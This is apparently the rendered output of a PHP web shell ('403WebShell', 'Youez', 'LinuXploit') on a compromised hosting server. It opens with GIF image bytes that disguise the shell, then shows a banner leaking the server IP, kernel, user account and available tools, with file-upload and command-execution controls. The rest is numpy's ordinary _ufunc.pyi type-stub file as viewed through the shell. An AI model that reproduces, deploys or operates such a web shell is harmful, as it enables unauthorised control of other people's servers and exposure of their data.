GIF89a=( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ !ù ' !ÿ NETSCAPE2.0 , =( þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE¯°¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ |¥ ٭&ºìE8œ¹kGÔAÞpx­a¶­ã R2XB®åE8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ  4#ZÔ‰O|-4Bs‘X:= QÉ œš lºÒyXJŠGȦ|s hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ ¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5 ½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ  l5‘ޝpß ´ ˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½ ‘Ý{ó)vmÞü%D~ 6f s}ŃƒDØW Eþ`‡þ À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`} lď’ÄÉ@4>ñd œ à‘vÒxNÃ×™@žd=ˆgsžG±æ ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH] †¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ ».Û¬¯t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°Ÿð0Ä_ ½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p% AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À× ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ ö×Þ^`8EÜ]ý.뜃Âç 7 ú ȉÞj œ½Dç zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼ &A¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂxŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`A Ú/NE€Ø†À9‚@¤à H½7”à‡%B‰`Àl*ƒó‘–‡8 2ñ%¸ —€:Ù1Á‰E¸àux%nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û °b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@% òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐ QTÂo‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3 ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚ !ù " , =( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g «¬ E ±± ¨­¶°ººE Á´”·®C¬²§Ç¶Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ» K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M '¡¨2¸*Ÿþ>#n↠å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA 9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦‚ ŽkÛTÇDpE@WÜ ²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰  h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8 #VÇá ‘å–ÄV„œ|Аè•m"сœn|@›U¶ÆÎž—Špb¥G¨ED”€±Úê2FÌIç? >Éxå Œ± ¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë QÀÉSÌÂÇ2ÌXÀ{æk²lQÁ2«ÊðÀ¯w|2Í h‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ ü ôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶ 0QwG#¯ æš[^Äþ $ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ìL¹ „®£œŠ‚à0œ]PÁ^p F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q q” ‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/ &.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ ¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—! ¦t)K%tœ-¦JF bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ ‰ !ù ) , =( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª« E$±²¨ª­ · °²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ E ééH½MÛÂGâªD­ çBêêϾD²ÒaÀà€Š1r­ðÓ¤ ÔožzU!L˜C'¾yW½UGtäÇïÙllê0×àÂuGþ)AÀs[þ·xì ÁxO%ƒûX2ó—  P£n›R/¡ÑšHše+êDm?# —‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°- <‡ *´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð ;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á  ~Öº“®›¸ÏMDfJÙ °„ÛµáWõ%§œ‚à©–‚X ÓØ)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d €CÁW)HÜcC$€L Ä7„r.á\{)@ð` @ äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦P …d’ä¡“¦ðÎTƒ¦ià|À _ ¥ Qi#¦Šg›Æ ›noMµ ›V ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, \jÛ´›6±¬¶C ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥ ²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëê 7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*3)O‘˜Ö[_hv ,àî×Et Ÿé¶BH€ Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g› êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºíï{ËC Ú— "”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»] A#ð «€¿šéz)Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa ¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oа^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ® ©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF Í[¤+‹ðɈ-áwj¨¥þ8¾rá ,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK “¦Ç# âDÂ:ûc?:R Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW ,ˆ”8(T™P‰F¡Jhç"‚ ; 403WebShell
403Webshell
Server IP : 172.67.177.218  /  Your IP : 216.73.216.195
Web Server : LiteSpeed
System : Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User : akhalid ( 749)
PHP Version : 8.3.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/numpy/_typing/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/numpy/_typing/_ufunc.pyi
"""A module with private type-check-only `numpy.ufunc` subclasses.

The signatures of the ufuncs are too varied to reasonably type
with a single class. So instead, `ufunc` has been expanded into
four private subclasses, one for each combination of
`~ufunc.nin` and `~ufunc.nout`.

"""

from typing import (
    Any,
    Generic,
    overload,
    TypeVar,
    Literal,
    SupportsIndex,
    Protocol,
)

from numpy import ufunc, _CastingKind, _OrderKACF
from numpy.typing import NDArray

from ._shape import _ShapeLike
from ._scalars import _ScalarLike_co
from ._array_like import ArrayLike, _ArrayLikeBool_co, _ArrayLikeInt_co
from ._dtype_like import DTypeLike

_T = TypeVar("_T")
_2Tuple = tuple[_T, _T]
_3Tuple = tuple[_T, _T, _T]
_4Tuple = tuple[_T, _T, _T, _T]

_NTypes = TypeVar("_NTypes", bound=int)
_IDType = TypeVar("_IDType", bound=Any)
_NameType = TypeVar("_NameType", bound=str)


class _SupportsArrayUFunc(Protocol):
    def __array_ufunc__(
        self,
        ufunc: ufunc,
        method: Literal["__call__", "reduce", "reduceat", "accumulate", "outer", "inner"],
        *inputs: Any,
        **kwargs: Any,
    ) -> Any: ...


# NOTE: In reality `extobj` should be a length of list 3 containing an
# int, an int, and a callable, but there's no way to properly express
# non-homogenous lists.
# Use `Any` over `Union` to avoid issues related to lists invariance.

# NOTE: `reduce`, `accumulate`, `reduceat` and `outer` raise a ValueError for
# ufuncs that don't accept two input arguments and return one output argument.
# In such cases the respective methods are simply typed as `None`.

# NOTE: Similarly, `at` won't be defined for ufuncs that return
# multiple outputs; in such cases `at` is typed as `None`

# NOTE: If 2 output types are returned then `out` must be a
# 2-tuple of arrays. Otherwise `None` or a plain array are also acceptable

class _UFunc_Nin1_Nout1(ufunc, Generic[_NameType, _NTypes, _IDType]):  # type: ignore[misc]
    @property
    def __name__(self) -> _NameType: ...
    @property
    def ntypes(self) -> _NTypes: ...
    @property
    def identity(self) -> _IDType: ...
    @property
    def nin(self) -> Literal[1]: ...
    @property
    def nout(self) -> Literal[1]: ...
    @property
    def nargs(self) -> Literal[2]: ...
    @property
    def signature(self) -> None: ...
    @property
    def reduce(self) -> None: ...
    @property
    def accumulate(self) -> None: ...
    @property
    def reduceat(self) -> None: ...
    @property
    def outer(self) -> None: ...

    @overload
    def __call__(
        self,
        __x1: _ScalarLike_co,
        out: None = ...,
        *,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _2Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> Any: ...
    @overload
    def __call__(
        self,
        __x1: ArrayLike,
        out: None | NDArray[Any] | tuple[NDArray[Any]] = ...,
        *,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _2Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> NDArray[Any]: ...
    @overload
    def __call__(
        self,
        __x1: _SupportsArrayUFunc,
        out: None | NDArray[Any] | tuple[NDArray[Any]] = ...,
        *,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _2Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> Any: ...

    def at(
        self,
        a: _SupportsArrayUFunc,
        indices: _ArrayLikeInt_co,
        /,
    ) -> None: ...

class _UFunc_Nin2_Nout1(ufunc, Generic[_NameType, _NTypes, _IDType]):  # type: ignore[misc]
    @property
    def __name__(self) -> _NameType: ...
    @property
    def ntypes(self) -> _NTypes: ...
    @property
    def identity(self) -> _IDType: ...
    @property
    def nin(self) -> Literal[2]: ...
    @property
    def nout(self) -> Literal[1]: ...
    @property
    def nargs(self) -> Literal[3]: ...
    @property
    def signature(self) -> None: ...

    @overload
    def __call__(
        self,
        __x1: _ScalarLike_co,
        __x2: _ScalarLike_co,
        out: None = ...,
        *,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _3Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> Any: ...
    @overload
    def __call__(
        self,
        __x1: ArrayLike,
        __x2: ArrayLike,
        out: None | NDArray[Any] | tuple[NDArray[Any]] = ...,
        *,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _3Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> NDArray[Any]: ...

    def at(
        self,
        a: NDArray[Any],
        indices: _ArrayLikeInt_co,
        b: ArrayLike,
        /,
    ) -> None: ...

    def reduce(
        self,
        array: ArrayLike,
        axis: None | _ShapeLike = ...,
        dtype: DTypeLike = ...,
        out: None | NDArray[Any] = ...,
        keepdims: bool = ...,
        initial: Any = ...,
        where: _ArrayLikeBool_co = ...,
    ) -> Any: ...

    def accumulate(
        self,
        array: ArrayLike,
        axis: SupportsIndex = ...,
        dtype: DTypeLike = ...,
        out: None | NDArray[Any] = ...,
    ) -> NDArray[Any]: ...

    def reduceat(
        self,
        array: ArrayLike,
        indices: _ArrayLikeInt_co,
        axis: SupportsIndex = ...,
        dtype: DTypeLike = ...,
        out: None | NDArray[Any] = ...,
    ) -> NDArray[Any]: ...

    # Expand `**kwargs` into explicit keyword-only arguments
    @overload
    def outer(
        self,
        A: _ScalarLike_co,
        B: _ScalarLike_co,
        /, *,
        out: None = ...,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _3Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> Any: ...
    @overload
    def outer(  # type: ignore[misc]
        self,
        A: ArrayLike,
        B: ArrayLike,
        /, *,
        out: None | NDArray[Any] | tuple[NDArray[Any]] = ...,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _3Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> NDArray[Any]: ...

class _UFunc_Nin1_Nout2(ufunc, Generic[_NameType, _NTypes, _IDType]):  # type: ignore[misc]
    @property
    def __name__(self) -> _NameType: ...
    @property
    def ntypes(self) -> _NTypes: ...
    @property
    def identity(self) -> _IDType: ...
    @property
    def nin(self) -> Literal[1]: ...
    @property
    def nout(self) -> Literal[2]: ...
    @property
    def nargs(self) -> Literal[3]: ...
    @property
    def signature(self) -> None: ...
    @property
    def at(self) -> None: ...
    @property
    def reduce(self) -> None: ...
    @property
    def accumulate(self) -> None: ...
    @property
    def reduceat(self) -> None: ...
    @property
    def outer(self) -> None: ...

    @overload
    def __call__(
        self,
        __x1: _ScalarLike_co,
        __out1: None = ...,
        __out2: None = ...,
        *,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _3Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> _2Tuple[Any]: ...
    @overload
    def __call__(
        self,
        __x1: ArrayLike,
        __out1: None | NDArray[Any] = ...,
        __out2: None | NDArray[Any] = ...,
        *,
        out: _2Tuple[NDArray[Any]] = ...,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _3Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> _2Tuple[NDArray[Any]]: ...
    @overload
    def __call__(
        self,
        __x1: _SupportsArrayUFunc,
        __out1: None | NDArray[Any] = ...,
        __out2: None | NDArray[Any] = ...,
        *,
        out: _2Tuple[NDArray[Any]] = ...,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _3Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> _2Tuple[Any]: ...

class _UFunc_Nin2_Nout2(ufunc, Generic[_NameType, _NTypes, _IDType]):  # type: ignore[misc]
    @property
    def __name__(self) -> _NameType: ...
    @property
    def ntypes(self) -> _NTypes: ...
    @property
    def identity(self) -> _IDType: ...
    @property
    def nin(self) -> Literal[2]: ...
    @property
    def nout(self) -> Literal[2]: ...
    @property
    def nargs(self) -> Literal[4]: ...
    @property
    def signature(self) -> None: ...
    @property
    def at(self) -> None: ...
    @property
    def reduce(self) -> None: ...
    @property
    def accumulate(self) -> None: ...
    @property
    def reduceat(self) -> None: ...
    @property
    def outer(self) -> None: ...

    @overload
    def __call__(
        self,
        __x1: _ScalarLike_co,
        __x2: _ScalarLike_co,
        __out1: None = ...,
        __out2: None = ...,
        *,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _4Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> _2Tuple[Any]: ...
    @overload
    def __call__(
        self,
        __x1: ArrayLike,
        __x2: ArrayLike,
        __out1: None | NDArray[Any] = ...,
        __out2: None | NDArray[Any] = ...,
        *,
        out: _2Tuple[NDArray[Any]] = ...,
        where: None | _ArrayLikeBool_co = ...,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _4Tuple[None | str] = ...,
        extobj: list[Any] = ...,
    ) -> _2Tuple[NDArray[Any]]: ...

class _GUFunc_Nin2_Nout1(ufunc, Generic[_NameType, _NTypes, _IDType]):  # type: ignore[misc]
    @property
    def __name__(self) -> _NameType: ...
    @property
    def ntypes(self) -> _NTypes: ...
    @property
    def identity(self) -> _IDType: ...
    @property
    def nin(self) -> Literal[2]: ...
    @property
    def nout(self) -> Literal[1]: ...
    @property
    def nargs(self) -> Literal[3]: ...

    # NOTE: In practice the only gufunc in the main namespace is `matmul`,
    # so we can use its signature here
    @property
    def signature(self) -> Literal["(n?,k),(k,m?)->(n?,m?)"]: ...
    @property
    def reduce(self) -> None: ...
    @property
    def accumulate(self) -> None: ...
    @property
    def reduceat(self) -> None: ...
    @property
    def outer(self) -> None: ...
    @property
    def at(self) -> None: ...

    # Scalar for 1D array-likes; ndarray otherwise
    @overload
    def __call__(
        self,
        __x1: ArrayLike,
        __x2: ArrayLike,
        out: None = ...,
        *,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _3Tuple[None | str] = ...,
        extobj: list[Any] = ...,
        axes: list[_2Tuple[SupportsIndex]] = ...,
    ) -> Any: ...
    @overload
    def __call__(
        self,
        __x1: ArrayLike,
        __x2: ArrayLike,
        out: NDArray[Any] | tuple[NDArray[Any]],
        *,
        casting: _CastingKind = ...,
        order: _OrderKACF = ...,
        dtype: DTypeLike = ...,
        subok: bool = ...,
        signature: str | _3Tuple[None | str] = ...,
        extobj: list[Any] = ...,
        axes: list[_2Tuple[SupportsIndex]] = ...,
    ) -> NDArray[Any]: ...

Youez - 2016 - github.com/yon3zu
LinuXploit